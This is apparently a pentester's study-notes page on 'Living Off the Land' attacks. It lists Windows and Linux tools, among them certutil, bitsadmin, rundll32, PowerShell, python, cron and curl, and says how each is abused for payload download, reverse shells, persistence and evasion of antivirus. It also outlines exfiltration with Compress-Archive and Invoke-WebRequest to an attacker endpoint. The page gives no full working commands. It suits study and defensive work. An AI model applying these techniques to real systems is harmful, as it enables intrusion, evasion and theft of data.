Quartz 4

Living Off the Land

3 min read

#post-exploitation #evasion #lolbins #red-team #pentesting

1. Core Definition: The “Native Arsenal”

“Living Off the Land” (LotL) is an attack strategy where an adversary uses native, pre-installed tools and features within the target’s operating system to carry out their objectives, rather than dropping custom malware or external hacking tools onto the system.

The binaries used in these attacks are commonly referred to as LOLBins (Living Off the Land Binaries) or LOLScripts. Because these tools are legitimate system utilities (often used by system administrators), their execution is generally trusted by the OS and security controls.

2. Why LotL is Effective (The Evasion Advantage)

From an offensive perspective, LotL is primarily about evasion and blending in:

  • Bypassing AV/EDR: Traditional Antivirus (AV) relies heavily on file hashes and signatures. Since LOLBins are digitally signed by Microsoft or Apple (or are standard Linux utilities), they will not trigger signature-based alerts.

  • Blending with Noise: System administrators use tools like PowerShell, WMI, or SSH daily. An attacker using these same tools hides their malicious actions within the normal operational baseline of the network.

  • Reduced Artifacts: By not dropping executables to the disk (fileless malware), attackers leave a much smaller forensic footprint for incident responders to analyze.

3. Common LOLBins by Operating System

Knowing which native tools to leverage is critical for post-exploitation.

Windows (The Most Documented)

  • certutil.exe: A command-line program installed as part of Certificate Services. Attackers frequently abuse it to download files from remote URLs or decode Base64-encoded payloads directly on the endpoint.

  • bitsadmin.exe: Used by Windows to download updates. It can be hijacked to download malicious payloads in the background, bypassing many proxy restrictions.

  • regsvr32.exe / rundll32.exe: Used to register and execute OLE controls or DLLs. Attackers use these to execute malicious code (often hosted remotely) while hiding behind a trusted Microsoft binary.

  • wmic.exe (WMI): Windows Management Instrumentation is a powerful administrative framework. It is heavily abused for lateral movement, remote execution, and establishing persistence.

  • powershell.exe: The classic LotL tool. While modern EDRs heavily monitor PowerShell, it remains a potent tool for memory-level execution, reconnaissance, and data manipulation.

Linux / Unix

  • python / perl / ruby: Often installed by default. Can be used to spawn fully interactive reverse shells or execute complex scripts without bringing in compiled binaries.

  • cron: The standard Linux task scheduler, heavily abused for establishing stealthy persistence.

  • wget / curl: Standard web request tools used to download payloads or exfiltrate data.

  • find / awk / tar: Used for local privilege escalation (if SUID bits are misconfigured) or staging/compressing data prior to exfiltration.

4. Pentesting Focus Areas: The LotL Attack Lifecycle

When conducting an engagement, you can leverage LotL across multiple phases:

A. Reconnaissance & Discovery

Instead of running Nmap or BloodHound immediately, use native commands to map the environment quietly.

  • Commands: netstat (active connections), arp -a (neighboring hosts), nltest (domain trust mapping), whoami /groups (current privileges).

B. Execution & Payload Delivery

Download and execute payloads entirely in memory to avoid writing to disk.

  • Technique: Using certutil to pull a Base64 encoded payload, decoding it locally, and injecting it into a running process using standard Windows APIs.

C. Exfiltration

Tying into DLP evasion, use native tools to move data out of the network.

  • Technique: Compressing sensitive files using native Compress-Archive in PowerShell, then sending the data out via Invoke-WebRequest to an attacker-controlled API endpoint.

Graph View

Backlinks